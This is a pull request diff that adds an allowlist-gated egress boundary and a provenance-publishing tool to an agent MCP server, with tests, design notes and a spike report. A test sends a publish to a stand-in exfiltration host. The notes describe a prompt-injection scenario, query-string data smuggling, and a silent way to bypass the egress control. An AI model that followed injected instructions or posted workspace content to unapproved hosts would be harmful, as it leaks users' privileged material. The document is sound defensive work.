### PR TITLE
feat(epistemic): governed egress boundary and allowlist-gated provenance publication

### DIFF
--- a/.changeset/epistemic-governed-egress.md
+++ b/.changeset/epistemic-governed-egress.md
@@ -1,0 +1,25 @@
+---
+"@beep/epistemic-server": patch
+"@beep/ontology-server": patch
+"@beep/ontology-use-cases": patch
+"@beep/mcp-kit": patch
+---
+
+feat(epistemic): governed egress boundary and allowlist-gated provenance publication
+
+`GovernedEgressLive` installs a `FetchHttpClient.Fetch` that authorizes outbound
+requests against `EpistemicConfig.destinationAllowlist`, appends a write-ahead
+decision row to the execution ledger before the request is issued, and rejects a
+denied destination with the reason-free `EgressDenied`. Destination matching
+canonicalizes through `URL` and requires a `/` boundary, so a lookalike host
+cannot borrow an allowlist entry's prefix.
+
+`ontology_publish_provenance` ships with that control: registered only when the
+allowlist is non-empty, taking `HttpClient.HttpClient` as a layer requirement so
+the governed `Fetch` applies to it, and returning a refusal byte-identical to a
+tier-gate refusal so a destination denial cannot be told apart from an operation
+denial.
+
+Also corrects a `SanitizedSpan.ts` comment: `Effect.provideContext` merges
+rather than replaces the fiber context. The code it justified was already
+correct; the explanation was not.

--- a/apps/professional-desktop/server/OntologyMcpTransport.ts
+++ b/apps/professional-desktop/server/OntologyMcpTransport.ts
@@ -5,6 +5,7 @@
  * @since 0.0.0
  */
 
+import { EpistemicConfig } from "@beep/epistemic-config/server";
 import {
   ExecutionSink,
   GrantOperation,
@@ -12,21 +13,29 @@ import {
   GrantResource,
   SinkDestination,
 } from "@beep/epistemic-domain/values/ExecutionGrant";
+import { GovernedEgressLive, GovernedEgressOptions } from "@beep/epistemic-server/GovernedEgress";
 import { GovernedTierGateLive, GovernedTierGateOptions } from "@beep/epistemic-server/GovernedTierGate";
 import { sanitizedToolkit } from "@beep/mcp-kit";
 import { OntologyMcpConfig } from "@beep/ontology-config/server";
-import { OntologyMcpMutationToolsLive, OntologyMcpReadOnlyToolsLive } from "@beep/ontology-server/tools";
+import {
+  OntologyMcpMutationToolsLive,
+  OntologyMcpPublishToolsLive,
+  OntologyMcpReadOnlyToolsLive,
+} from "@beep/ontology-server/tools";
 import {
   ExportProvenanceTool,
   OntologyMutationToolkit,
+  OntologyPublishToolkit,
   OntologyReadOnlyToolkit,
   ProposeChangeBatchTool,
+  PublishProvenanceTool,
   RepairOntologyTool,
 } from "@beep/ontology-use-cases/tools";
 import { A, O } from "@beep/utils";
 import { Context, Data, Duration, Effect, Layer, Metric } from "effect";
 import * as McpServer from "effect/unstable/ai/McpServer";
 import { Headers, HttpMiddleware, HttpRouter, HttpServerRequest, HttpServerResponse } from "effect/unstable/http";
+import * as FetchHttpClient from "effect/unstable/http/FetchHttpClient";
 import { requireRpcSessionToken } from "./RpcSessionAuth.ts";
 import type { Redacted } from "effect";
 
@@ -102,6 +111,7 @@ const approvedOntologyMutationTools: ReadonlyArray<string> = [
   ProposeChangeBatchTool.name,
   RepairOntologyTool.name,
   ExportProvenanceTool.name,
+  PublishProvenanceTool.name,
 ];
 
 // Every governed ontology mutation writes the local workspace; the sink triple
@@ -112,6 +122,19 @@ const ontologyWorkspaceSink = ExecutionSink.make({
   audience: "local-workspace",
   destination: SinkDestination.make("workspace://ontology"),
   sinkClass: "mcp-write",
+});
+
+// The publication branch's sink names the *class* of egress, not a URL, and
+// that is deliberate: `ToolCallRequest` carries no parameters, so the gate
+// cannot see which destination a dispatch intends. The split is therefore
+// explicit — the gate decides whether this session may publish at all, the
+// governed egress `Fetch` decides which destination a request may reach, and
+// each writes its own decision row. Reading one row without the other tells
+// half the story.
+const ontologyEgressSink = ExecutionSink.make({
+  audience: "external-network",
+  destination: SinkDestination.make("network://governed-egress"),
+  sinkClass: "network-egress",
 });
 
 // Generous against any interactive session length; a session's frozen grants
@@ -134,6 +157,7 @@ const ontologySessionGrantTtl = Duration.hours(12);
 export const makeOntologyMcpTransportLayer = (options: {
   readonly token: Redacted.Redacted;
   readonly approvedMutationTools?: ReadonlyArray<string> | undefined;
+  readonly egressFetch?: typeof globalThis.fetch | undefined;
 }) => {
   const approvedTools = options.approvedMutationTools ?? approvedOntologyMutationTools;
   const security = ontologyMcpSecurityMiddleware(options.token);
@@ -147,7 +171,13 @@ export const makeOntologyMcpTransportLayer = (options: {
       GovernedTierGateLive(
         GovernedTierGateOptions.make({
           grantTtl: ontologySessionGrantTtl,
-          operations: A.map(approvedTools, (tool) => GrantOperation.make(tool)),
+          // Publication is governed by its own branch against a network sink;
+          // granting it here as well would be a second, unintended authority
+          // for it against the workspace sink.
+          operations: A.map(
+            A.filter(approvedTools, (tool) => tool !== PublishProvenanceTool.name),
+            (tool) => GrantOperation.make(tool)
+          ),
           purpose: GrantPurpose.make("ontology-workspace-mutation"),
           resource: GrantResource.make("ontology-workspace"),
           sink: ontologyWorkspaceSink,
@@ -155,11 +185,69 @@ export const makeOntologyMcpTransportLayer = (options: {
       )
     )
   );
+  // Placement is load-bearing and is not type-checked: `Fetch` is a Reference,
+  // so a missing override silently resolves to the platform fetch instead of
+  // failing to compile. It goes into the graph that builds THIS client, which
+  // is the client the publication handler receives.
+  // `Layer.fresh` is load-bearing, not tidiness. `FetchHttpClient.layer` is a
+  // module-level object and layer builds are memoized by object identity across
+  // one graph, so without a fresh copy this governed client is the *same*
+  // instance the sidecar's other consumers resolve — `AnthropicLive`
+  // (`Anthropic.service.ts`) and `ObservabilityLive`'s OTLP exporter
+  // (`runtime/Observability.ts`) both provide into this very layer. Whichever
+  // builds first wins for all of them: the governed default-deny fetch would be
+  // applied to every Anthropic and OTLP request, failing them with
+  // `EgressDenied` and writing spurious denied rows into this boundary's
+  // hash chain. Nothing type-checks this — `Fetch` is a Reference, so the
+  // layer's output is `never`.
+  const governedHttpClient = Layer.fresh(FetchHttpClient.layer).pipe(
+    Layer.provide(
+      GovernedEgressLive(
+        GovernedEgressOptions.make({
+          grantTtl: ontologySessionGrantTtl,
+          operation: GrantOperation.make("http-egress"),
+          purpose: GrantPurpose.make("ontology-provenance-publication"),
+          resource: GrantResource.make("ontology-workspace"),
+        }),
+        options.egressFetch
+      )
+    )
+  );
+  const publish = sanitizedToolkit(OntologyPublishToolkit).pipe(
+    Layer.provide(OntologyMcpPublishToolsLive),
+    Layer.provide(governedHttpClient),
+    Layer.provide(
+      GovernedTierGateLive(
+        GovernedTierGateOptions.make({
+          grantTtl: ontologySessionGrantTtl,
+          // Drawn from the same approval list as the workspace branch, so
+          // "registration is not authorization" holds here too: a test can
+          // register the publication tool while granting nothing, and every
+          // dispatch is refused before any destination is even considered.
+          operations: A.map(
+            A.filter(approvedTools, (tool) => tool === PublishProvenanceTool.name),
+            (tool) => GrantOperation.make(tool)
+          ),
+          purpose: GrantPurpose.make("ontology-provenance-publication"),
+          resource: GrantResource.make("ontology-workspace"),
+          sink: ontologyEgressSink,
+        })
+      )
+    )
+  );
   const preflight = HttpRouter.add("OPTIONS", "/mcp", HttpServerResponse.empty({ status: 204 })).pipe(
     Layer.provide(security.layer)
   );
+  // The publication tool is registered only when an operator has named at least
+  // one destination. An empty allowlist is the default, so the tool does not
+  // exist on a stock install — the sink and its control ship together.
   const registration = Layer.unwrap(
-    Effect.map(OntologyMcpConfig, (config) => (config.mutationsEnabled ? Layer.merge(readOnly, mutations) : readOnly))
+    Effect.gen(function* () {
+      const mcpConfig = yield* OntologyMcpConfig;
+      const epistemic = yield* EpistemicConfig;
+      const governed = mcpConfig.mutationsEnabled ? Layer.merge(readOnly, mutations) : readOnly;
+      return epistemic.destinationAllowlist.length === 0 ? governed : Layer.merge(governed, publish);
+    })
   );
   const mcp = registration.pipe(Layer.provide(server));
 

--- a/apps/professional-desktop/test/integration/ontology-mcp-http.test.ts
+++ b/apps/professional-desktop/test/integration/ontology-mcp-http.test.ts
@@ -1,6 +1,7 @@
 /** @effect-diagnostics nodeBuiltinImport:skip-file */
 import * as NodeHttp from "node:http";
-import { EpistemicConfigTest } from "@beep/epistemic-config/test";
+import { defaultPolicyRevision, EpistemicServerConfig } from "@beep/epistemic-config/server";
+import { EpistemicConfigTest, fixtureAllowedDestination, makeEpistemicConfigTest } from "@beep/epistemic-config/test";
 import { verifyExecutionDecisionChain, verifyOutcomeBinding } from "@beep/epistemic-domain/values/ExecutionRecord";
 import { ExecutionLedger, ExecutionLedgerUnavailable } from "@beep/epistemic-use-cases/ExecutionLedger";
 import { OntologyMcpConfigLive } from "@beep/ontology-config/layer";
@@ -8,6 +9,8 @@ import { ChangeOperation } from "@beep/ontology-domain/aggregates/Session";
 import { OntologyFilePath } from "@beep/ontology-use-cases/aggregates/Session";
 import {
   CapabilityMetadataResponse,
+  ExportProvenanceRequest,
+  ExportProvenanceTool,
   OntologySparqlQueryRequest,
   OntologySparqlQueryResponse,
   OntologyToolFailure,
@@ -16,6 +19,8 @@ import {
   ProposeChangeBatchRequest,
   ProposeChangeBatchResponse,
   ProposeChangeBatchTool,
+  PublishProvenanceResponse,
+  PublishProvenanceTool,
 } from "@beep/ontology-use-cases/tools";
 import { makeLiteral, makeNamedNode, makeQuad } from "@beep/rdf/Rdf";
 import { XSD_STRING } from "@beep/rdf/Vocab/Xsd";
@@ -34,6 +39,7 @@ import * as FetchHttpClient from "effect/unstable/http/FetchHttpClient";
 import { RpcClient, RpcSerialization } from "effect/unstable/rpc";
 import { makeOntologyMcpTransportLayer } from "../../server/OntologyMcpTransport.ts";
 import { rpcSessionAuthorizationHeader } from "../../server/RpcSessionAuth.ts";
+import type { EpistemicConfig } from "@beep/epistemic-config/server";
 import type { ExecutionDecisionRecord, ExecutionOutcomeRecord } from "@beep/epistemic-domain/values/ExecutionRecord";
 import type { Scope } from "effect";
 
@@ -49,6 +55,8 @@ const decodeOntologySparqlQueryResponse = S.decodeUnknownEffect(OntologySparqlQu
 const encodeProposeChangeBatchRequest = S.encodeUnknownEffect(ProposeChangeBatchRequest);
 const decodeProposeChangeBatchResponse = S.decodeUnknownEffect(ProposeChangeBatchResponse);
 const decodeOntologyToolFailure = S.decodeUnknownEffect(OntologyToolFailure);
+const encodeExportProvenanceRequest = S.encodeUnknownEffect(ExportProvenanceRequest);
+const decodePublishProvenanceResponse = S.decodeUnknownEffect(PublishProvenanceResponse);
 
 const assertSchemaRoundTrip = <Schema extends S.Codec<unknown>>(schema: Schema): void => {
   const encode = S.encodeResult(schema);
@@ -73,6 +81,8 @@ ex:bob a ex:Person ; ex:name "Bob" .
 type TransportOptions = {
   readonly mutationsEnabled: boolean;
   readonly approvedMutationTools: ReadonlyArray<string>;
+  readonly egressFetch?: typeof globalThis.fetch | undefined;
+  readonly epistemicConfig?: Layer.Layer<EpistemicConfig> | undefined;
   readonly ledger?: Layer.Layer<ExecutionLedger> | undefined;
 };
 
@@ -142,10 +152,14 @@ const transportConfigProvider = (root: string, options: TransportOptions) =>
   );
 
 const transportLayer = (root: string, options: TransportOptions) =>
-  makeOntologyMcpTransportLayer({ token, approvedMutationTools: options.approvedMutationTools }).pipe(
+  makeOntologyMcpTransportLayer({
+    token,
+    approvedMutationTools: options.approvedMutationTools,
+    egressFetch: options.egressFetch,
+  }).pipe(
     Layer.provide(OntologyMcpConfigLive),
     Layer.provide(options.ledger ?? silentLedgerLayer),
-    Layer.provide(EpistemicConfigTest),
+    Layer.provide(options.epistemicConfig ?? EpistemicConfigTest),
     Layer.provide(transportConfigProvider(root, options)),
     Layer.provide(NodeServices.layer),
     Layer.orDie
@@ -498,6 +512,131 @@ describe("professional desktop ontology MCP streamable HTTP mount", { concurrent
       );
       expect(yield* Ref.get(probe.decisions)).toHaveLength(0);
       expect(yield* Ref.get(probe.outcomes)).toHaveLength(0);
+    })
+  );
+
+  it.effect("leaves ontology_publish_provenance unregistered when no destination is allowlisted", () =>
+    withHttpServer(
+      {
+        mutationsEnabled: true,
+        approvedMutationTools: [ProposeChangeBatchTool.name],
+        epistemicConfig: makeEpistemicConfigTest(
+          EpistemicServerConfig.make({ destinationAllowlist: [], policyRevision: defaultPolicyRevision })
+        ),
+      },
+      () =>
+        Effect.gen(function* () {
+          const client = yield* makeMcpClient();
+          const listed = yield* client["tools/list"](undefined);
+          const names = A.map(listed.tools, (tool) => tool.name);
+
+          expect(A.contains(names, PublishProvenanceTool.name)).toBe(false);
+          // The sibling positive fact: registration is otherwise working, so
+          // the absence above is the allowlist gate and not a broken mount.
+          expect(A.contains(names, ProposeChangeBatchTool.name)).toBe(true);
+        })
+    )
+  );
+
+  it.effect("carries a publication from a real tool handler through the governed egress fetch", () =>
+    Effect.gen(function* () {
+      const probe = yield* makeLedgerProbe();
+      // The base fetch the governed boundary delegates to when it allows a
+      // request. Nothing here reaches the network; being called at all is the
+      // proof that the policy Fetch was the one in force, because an
+      // un-overridden Fetch would have used the platform fetch instead. A plain
+      // array, not a Ref: `fetch` has no fiber to run an Effect on.
+      const delivered: Array<string> = [];
+      const egressFetch = ((input: RequestInfo | URL, init?: RequestInit) => {
+        delivered.push(`${String(init?.method ?? "GET")} ${String(input)}`);
+        return Promise.resolve(new Response("stored", { status: 202 }));
+      }) as typeof globalThis.fetch;
+
+      yield* withHttpServer(
+        {
+          mutationsEnabled: true,
+          // Publication is granted; the change-batch tool is registered but
+          // deliberately ungranted, so the test has a real gate refusal to
+          // compare the egress refusal against.
+          approvedMutationTools: [ExportProvenanceTool.name, PublishProvenanceTool.name],
+          egressFetch,
+          ledger: probe.layer,
+        },
+        (_root, ontologyPath) =>
+          Effect.gen(function* () {
+            const client = yield* makeMcpClient();
+            const opened = yield* openThroughMcp(client, ontologyPath);
+            const exportRequest = yield* encodeExportProvenanceRequest(
+              ExportProvenanceRequest.make({
+                path: ontologyPath,
+                baseIri: O.none(),
+                sessionHandle: O.none(),
+                expectedFingerprint: opened.fingerprint,
+                provPath: yield* decodeOntologyFilePath("ontology.prov.ttl"),
+                datasetPath: yield* decodeOntologyFilePath("ontology.dataset.ttl"),
+              })
+            );
+            const exported = yield* client["tools/call"]({
+              name: ExportProvenanceTool.name,
+              arguments: exportRequest,
+            });
+            expect(exported.isError).toBe(false);
+
+            const allowedCall = yield* client["tools/call"]({
+              name: PublishProvenanceTool.name,
+              arguments: {
+                provPath: "ontology.prov.ttl",
+                destination: `${fixtureAllowedDestination}/v1/provenance`,
+              },
+            });
+            const published = yield* decodePublishProvenanceResponse(allowedCall.structuredContent);
+
+            expect(allowedCall.isError).toBe(false);
+            expect(published.status).toBe(202);
+            expect(published.publishedBytes).toBeGreaterThan(0);
+
+            const deniedCall = yield* client["tools/call"]({
+              name: PublishProvenanceTool.name,
+              arguments: { provPath: "ontology.prov.ttl", destination: "https://exfiltration.example/collect" },
+            });
+            const refusal = yield* decodeOntologyToolFailure(deniedCall.structuredContent);
+            const ungrantedCall = yield* client["tools/call"]({
+              name: ProposeChangeBatchTool.name,
+              arguments: yield* encodeProposeChangeBatchRequest(
+                ProposeChangeBatchRequest.make({
+                  path: ontologyPath,
+                  expectedFingerprint: opened.fingerprint,
+                  operations: [addName("carol", "Carol")],
+                })
+              ),
+            });
+            const gateRefusal = yield* decodeOntologyToolFailure(ungrantedCall.structuredContent);
+
+            expect(deniedCall.isError).toBe(true);
+            expect(refusal._tag).toBe("OntologyTierGateRefusal");
+            // A destination denial must be indistinguishable from an operation
+            // denial. This is the only place both are visible: the guidance
+            // string is restated in the ontology slice because slices cannot
+            // import each other, so this assertion is what keeps them in sync.
+            expect(gateRefusal._tag).toBe("OntologyTierGateRefusal");
+            expect(refusal._tag === "OntologyTierGateRefusal" && refusal.guidance).toBe(
+              gateRefusal._tag === "OntologyTierGateRefusal" && gateRefusal.guidance
+            );
+          })
+      );
+
+      // The allowlisted destination was delivered; the other never reached the
+      // network side of the boundary at all.
+      expect(delivered).toEqual([`POST ${fixtureAllowedDestination}/v1/provenance`]);
+
+      const decisions = yield* Ref.get(probe.decisions);
+      const egressDecisions = A.filter(decisions, (record) => record.sinkClass === "network-egress");
+      // Two decisions per publication attempt: the gate's (may this session
+      // publish) and the egress boundary's (may this destination be reached).
+      // The denied attempt is refused by the second, not the first.
+      expect(A.length(egressDecisions)).toBeGreaterThanOrEqual(3);
+      expect(A.some(egressDecisions, (record) => record.verdict === "denied")).toBe(true);
+      expect(A.some(egressDecisions, (record) => record.verdict === "allowed")).toBe(true);
     })
   );
 

--- a/goals/agent-execution-authority/PLAN.md
+++ b/goals/agent-execution-authority/PLAN.md
@@ -10,7 +10,31 @@ the `frozen-grant-set` law; PR 2 (#463) shipped `@beep/epistemic-config`, the
 the append-only ledger tables, migration, port, and Drizzle adapter; PR 4
 (#471) shipped `recordOutcome`/`TierGateSettlement` on the tier gate and
 `EgressDenied` in `@beep/api-transport`; PR 5 shipped `GovernedTierGateLive`
-with the run store, swapped in at the MCP transport. PR 6 is next.
+with the run store, swapped in at the MCP transport; PR 6 shipped the governed
+egress `Fetch` and `ontology_publish_provenance`. PR 7 is next.
+
+**PR 6 corrections to this plan, recorded.** The blocking check passed, and
+measuring it falsified the mechanism this plan and the README assumed:
+
+1. *"`provideContext` replaces the fiber context"* is false — it merges
+   (`updateContext(self, Context.merge(context))`), with the provided context
+   winning on key collisions and request-only services surviving. The policy
+   `Fetch` therefore reaches handlers in every placement tested, not only when
+   provided into the toolkit's graph.
+2. *The recommended placement works for a different reason than stated.*
+   `HttpClient.layerMergedContext` captures the client layer's own build
+   context and merges it at execute time, so the override rides with the
+   `HttpClient` and reaches handlers whose context never contains `Fetch`.
+3. *The hazard is inverted.* Request-time context takes **precedence**, so a
+   per-request `Fetch` displaces the composition-root one. No middleware or
+   request-scoped layer in a governed transport may provide that reference.
+4. *"The policy fetch writes its own typed refusal to the ledger"* is
+   implemented, but it cannot write into the **session's** chain: `Fetch` is a
+   plain promise-returning function with no fiber, so it cannot read
+   `CurrentMcpCaller`. Egress decisions are chained into their own run and
+   correlate to session rows by time.
+
+Evidence: [`history/pr6-fetch-reach-spike.md`](./history/pr6-fetch-reach-spike.md).
 
 **PR 5 corrections to this plan, recorded.** Two instructions below were wrong
 and are superseded by what landed:

--- a/goals/agent-execution-authority/README.md
+++ b/goals/agent-execution-authority/README.md
@@ -37,40 +37,84 @@ Use this command for execution-capable sessions:
 
 ## Current Phase
 
-**P1 Implement.** PRs 1–5 have landed. Next concrete action: PR 6 — the policy
-`Fetch` and `ontology_publish_provenance`. **Re-read the PR 6 scope in
-`PLAN.md` and the SPEC stop conditions before starting**: it ships an
-agent-controllable outbound POST of workspace content to justify its own
-control, the tool registers only when the destination allowlist is non-empty,
-and it carries a blocking check — a request issued from *inside a real tool
-handler* must demonstrably reach the policy fetch (the spike only proved a
-directly-provided effect). The handler must require `HttpClient.HttpClient`
-and never self-provide it; the policy fetch writes its own typed refusal to
-the ledger and rejects with `EgressDenied` (already landed in
-`@beep/api-transport`); the ontology handler matches the cause and returns a
-typed refusal through its existing `failureMode: "return"` envelope. Grants
-for `network-egress` destinations come from `EpistemicConfig.destinationAllowlist`
-— extend the `GovernedTierGateOptions` grant blueprint at the composition root
-rather than teaching `epistemic/server` any ontology names.
+**P1 Implement.** PRs 1–6 have landed. Next concrete action: PR 7 — the
+composed fixture acceptance test. On one MCP session: tool 1 reads workspace
+content carrying an injected instruction, tool 2 attempts an outbound POST to
+the injected destination, and the authority frozen at session open denies it.
+Plus the full acceptance suite from `SPEC.md`.
 
-**Head start on the blocking check, from working inside `SanitizedSpan.ts`
-during PR 5.** `registerSanitizedToolkit` captures `const services = yield*
-Effect.context<never>()` at **layer build**, and each dispatch runs
-`Effect.provideContext(requestServices)` where `requestServices = Context.add(
-services, CurrentMcpCaller, …)`. Because `provideContext` *replaces* the fiber
-context rather than merging into it, this predicts a sharp rule PR 6 must
-verify rather than assume: the policy `Fetch` reaches handlers **iff** it is
-provided into the layer graph that builds the toolkit (e.g. another
-`Layer.provide` on the transport layer in `main.ts`), and does **not** reach
-them if it is provided only around the HTTP server or per-request, since that
-context is discarded at dispatch. PR 5 proved the analogous read works — the
-`mcp-session-id` header had to be read *before* `provideContext`, and the
-session-chaining test passes because of it. Test the `Fetch` case explicitly;
-a passing egress test with the reference in the wrong place would be proving
-the default `globalThis.fetch`, not the policy one.
+**What PR 7 inherits, and the one thing it must not assume.** The denial in
+that scenario comes from the *egress* boundary, not the tier gate: the gate
+grants `ontology_publish_provenance` as an operation, and the destination is
+refused by `GovernedEgress` because it is not on the allowlist. So the fixture
+must assert on **two** decision rows from **two** runs — the session's chain and
+the egress boundary's own chain — not one. `history/pr6-fetch-reach-spike.md`
+records why they cannot be one chain: `Fetch` is a plain promise-returning
+function with no fiber, so the egress boundary cannot see `CurrentMcpCaller`
+and cannot know which session provoked a request. Correlation is by time.
+Closing that gap is a real follow-up, and inventing a session from ambient
+state would reintroduce exactly the cross-dispatch misattribution PR 5's fiber
+correlation exists to prevent.
 
 ## Latest Evidence
 
+- **PR 6** (2026-07-27) — the egress boundary and the tool it exists to govern.
+  `GovernedEgressLive` installs a `FetchHttpClient.Fetch` that resolves a
+  requested URL to the allowlist entry covering it, writes a write-ahead
+  decision row, and rejects a denied destination with the reason-free
+  `EgressDenied`. `ontology_publish_provenance` registers only when the
+  allowlist is non-empty, takes `HttpClient.HttpClient` as a layer requirement
+  and never self-provides it, and translates a denial into the same refusal an
+  operation denial produces.
+
+  **The blocking check passed, and it falsified the prediction this packet
+  carried.** Full evidence in
+  [`history/pr6-fetch-reach-spike.md`](./history/pr6-fetch-reach-spike.md):
+  - `Effect.provideContext` **merges**, it does not replace. The claim that it
+    replaces was wrong, and the `SanitizedSpan.ts` comment asserting it is
+    corrected in this PR. The PR 5 code it justified was already correct.
+  - The override reaches handlers in *every* placement tested, including
+    per-request. In the recommended placement the handler's own context does
+    not contain `Fetch` at all — `HttpClient.layerMergedContext` merges the
+    client layer's build context at execute time, so the override rides with
+    the client rather than the handler.
+  - The real hazard is the inverse: request-time context takes **precedence**,
+    so a per-request `Fetch` silently displaces the composition-root one. That
+    invariant is recorded on `GovernedEgress.layer.ts`.
+
+  Two properties the tests pin. Registration is not authorization for this
+  branch either — the publish gate draws its grant from the same approval list,
+  so a test can register the tool and grant nothing. And a destination denial is
+  byte-identical to an operation denial; the guidance string is restated in the
+  ontology slice because slices cannot import each other, and the app test is
+  what holds the two in sync.
+
+  **Two majors an adversarial review caught before this landed, each now a
+  test or a comment that explains itself:**
+  - *The governed `Fetch` escaped its own branch.* `FetchHttpClient.layer` is a
+    module-level object and layer builds are memoized by object identity across
+    one graph, so the "governed" client was the same instance `AnthropicLive`
+    and the OTLP exporter resolve. Whichever built first won for all of them —
+    at this entrypoint the governed one, meaning every `api.anthropic.com`
+    request would have been refused with `EgressDenied` and written a spurious
+    denied row into this boundary's hash chain, with the allowlist non-empty
+    being the only trigger. `Layer.fresh` is the fix; nothing type-checks it,
+    because a `Reference` layer's output is `never`.
+  - *Allowed rows named the allowlist entry, not the request.* Coverage
+    deliberately ignores the query string, and the record reused the covering
+    entry — so a publish to `.../publish?payload=<privileged text>` produced a
+    row byte-identical to a benign one while the query went out over the wire
+    intact. The record now digests the full requested form (query and fragment
+    included); coverage still ignores it, so a query can neither buy nor lose
+    authority.
+
+  Also pinned: the chain stays dense under concurrent authorizations, which is
+  not free — every `fetch` authorizes on its own detached fiber, so only the
+  boundary's semaphore serializes the ledger append and the chain advance.
+
+  **Known gap, recorded not hidden:** egress decision rows are not correlated to
+  an MCP session, for the structural reason above. An auditor joins them to
+  session rows by time.
 - **PR 5** (2026-07-27) — enforcement begins. `GovernedTierGateLive` in
   `epistemic/server` implements `TierGateShape`: `evaluate` freezes a
   per-session grant set on the session's first dispatch, evaluates with the
@@ -153,14 +197,17 @@ High-signal constraints that do not belong in the normative spec:
 - **This is not a sandbox.** It buys the policy plane and its records. Host
   isolation is a separate candidate packet, and a green suite here must never be
   described as "the sandbox exists."
-- **Two spike findings are load-bearing and one is only half-proven.** The
-  `Fetch` override was verified for a *directly-provided* effect, not through a
-  server whose handler context is captured at layer build
-  (`SanitizedSpan.ts:226`). PR 6 carries a blocking check for this.
-- **PR 6 ships an exfiltration primitive to justify its own control.**
-  `ontology_publish_provenance` is default-off and allowlist-gated, which is what
-  makes it defensible — but re-read that scope deliberately rather than
-  inheriting it.
+- **Both spike findings are now proven through a running server.** The `Fetch`
+  override was re-verified end-to-end in PR 6, and the mechanism turned out not
+  to be the one predicted — see
+  [`history/pr6-fetch-reach-spike.md`](./history/pr6-fetch-reach-spike.md).
+- **The exfiltration primitive is live from PR 6 on.**
+  `ontology_publish_provenance` is default-off (empty allowlist ⇒ unregistered)
+  and its destination is allowlist-gated, which is what makes it defensible.
+  Anyone widening `EPISTEMIC_EGRESS_DESTINATION_ALLOWLIST` is authorizing an
+  agent-chosen POST of workspace content to that origin and everything beneath
+  it, in a product that holds privileged material. Treat allowlist edits as a
+  security review, not configuration.
 - **The `audience` axis is half-degenerate in v1.** Only `external-network` is
   genuinely exercised; every governed MCP write is a local workspace file. Do not
   claim the axis is validated.

--- a/goals/agent-execution-authority/SPEC.md
+++ b/goals/agent-execution-authority/SPEC.md
@@ -274,12 +274,16 @@ checked by the full lane.
 - Verification requires credentials, cost, destructive side effects, or policy
   approval not named in this spec.
 - The same blocker repeats after reasonable investigation.
-- **The policy `Fetch` override does not reach handlers dispatched through the
-  running MCP server.** The 2026-07-25 spike proved the mechanism for a
-  directly-provided effect, not through a server whose handler context is
-  captured at layer build (`SanitizedSpan.ts:226`). If PR 6 cannot demonstrate a
-  request from inside a real tool handler hitting the policy fetch, stop and
-  report — the egress half of this packet rests on it.
+- ~~**The policy `Fetch` override does not reach handlers dispatched through the
+  running MCP server.**~~ **Discharged 2026-07-27** by measurement through the
+  real `sanitizedToolkit` + `McpServer.layerHttp` stack, with a control proving
+  the harness could detect the un-overridden case. Evidence and the corrected
+  mechanism:
+  [`history/pr6-fetch-reach-spike.md`](./history/pr6-fetch-reach-spike.md). The
+  override reaches handlers in every placement tested; the surviving hazard is
+  the reverse of the one anticipated — a `Fetch` provided *per request* takes
+  precedence over the composition-root one, so nothing in a transport that
+  mounts governed tools may provide that reference per request.
 - **PR 6 adds an agent-controllable outbound POST of workspace content** to a
   product holding privileged material. Re-read that scope deliberately before
   landing it; do not inherit it as settled.

--- a/goals/agent-execution-authority/history/pr6-fetch-reach-spike.md
+++ b/goals/agent-execution-authority/history/pr6-fetch-reach-spike.md
@@ -1,0 +1,85 @@
+# PR 6 blocking check — does a policy `Fetch` reach a dispatched MCP tool handler?
+
+**Date:** 2026-07-27
+**Verdict:** **PASSED.** The stop condition in `SPEC.md` is discharged.
+**Method:** a throwaway spike mounting a one-tool toolkit through the real
+`sanitizedToolkit` + `McpServer.layerHttp` stack, driven by a real MCP client
+over `HttpRouter.toWebHandler`, with the tool handler issuing an outbound POST.
+Five placements, each with a recording `fetch`. The spike file was deleted after
+the findings were recorded here; the shipping proof is the PR 6 test.
+
+## Results
+
+| # | Where `Fetch` is provided | Handler ctx has `Fetch` | Which fetch ran |
+| --- | --- | --- | --- |
+| A | into `FetchHttpClient.layer`'s own graph | **no** | **policy** |
+| B | onto the outer composite layer | yes | policy |
+| C | per-request, via HTTP middleware | yes | policy |
+| D | nowhere (control) | no | `globalThis.fetch` |
+| E | policy at root **and** contender per-request | yes | **contender** |
+
+D is the falsification control: with no override anywhere the request lands on
+the stubbed global, so the harness can distinguish the cases. Without it, A–C
+passing would have proven nothing. (The first run of this spike had only A–C,
+all three passed, and the result was worthless.)
+
+## What the packet predicted, and why it was wrong
+
+`README.md` predicted the policy `Fetch` would reach handlers **iff** provided
+into the toolkit's layer graph, and would be discarded if provided per-request,
+"because `provideContext` *replaces* the fiber context rather than merging."
+
+Both halves are false.
+
+1. **`Effect.provideContext` merges.** `internal/effect.ts:2160` is
+   `updateContext(self, Context.merge(context))` — the provided context wins on
+   key collisions, but everything already in the fiber context survives. Nothing
+   is discarded. This is why C works.
+2. **A works for a different reason than predicted.** In A the handler's context
+   does **not** contain `Fetch` (measured), yet the policy fetch still ran. The
+   override rides with the `HttpClient` layer itself:
+   `HttpClient.layerMergedContext` (`HttpClient.ts:1924-1935`) captures its own
+   build context and, at execute time, runs
+   `Effect.updateContext((input) => Context.merge(context, input))`. So the
+   `Fetch` reference is resolved from *(HttpClient layer build context)* merged
+   with *(request-time context)*.
+
+The practical consequence is the opposite of the prediction: the override is
+**harder** to lose than feared, not easier.
+
+## The finding that actually matters — E
+
+`Context.merge(context, input)` gives **`input`** — the request-time context —
+precedence. So a `Fetch` placed into the fiber context per-request **displaces**
+the composition-root policy fetch. In E the contender ran and the policy fetch
+recorded nothing.
+
+This is a real property of the egress control and it is not defended by the type
+system:
+
+> **Invariant:** no layer or middleware in the MCP transport graph may provide
+> `FetchHttpClient.Fetch` per-request. Anything that does silently replaces the
+> egress boundary for every tool dispatched behind it.
+
+Today nothing in the transport does this, and no attacker-controlled code runs
+in that position — the graph is composition-root code only. It is recorded
+because the failure is silent: the tool still works, the ledger still gets the
+tool's own decision rows, and only the egress refusal disappears.
+
+## Correction owed to PR 5
+
+`SanitizedSpan.ts` carries a comment claiming `provideContext` "replaces the
+context with the layer-build services: `HttpServerRequest` is in the request
+fiber here and gone inside the handler." Measured: `HttpServerRequest` is
+present inside the handler in all five placements. The **code** is fine —
+reading the session header at the request boundary is correct and does not
+depend on the false claim — but the justification is wrong and is corrected in
+PR 6 rather than left to mislead the next reader.
+
+## Incidental finding
+
+`Context.getReferenceUnsafe` memoizes a `Reference`'s default **on the reference
+object, process-wide** (`Context.ts:1526-1531`). `FetchHttpClient.Fetch`'s
+default therefore captures whatever `globalThis.fetch` was at first resolution
+and keeps it forever. Irrelevant to production; it matters to any test that
+stubs the global, which must clear the memo first.

--- a/goals/agent-execution-authority/ops/manifest.json
+++ b/goals/agent-execution-authority/ops/manifest.json
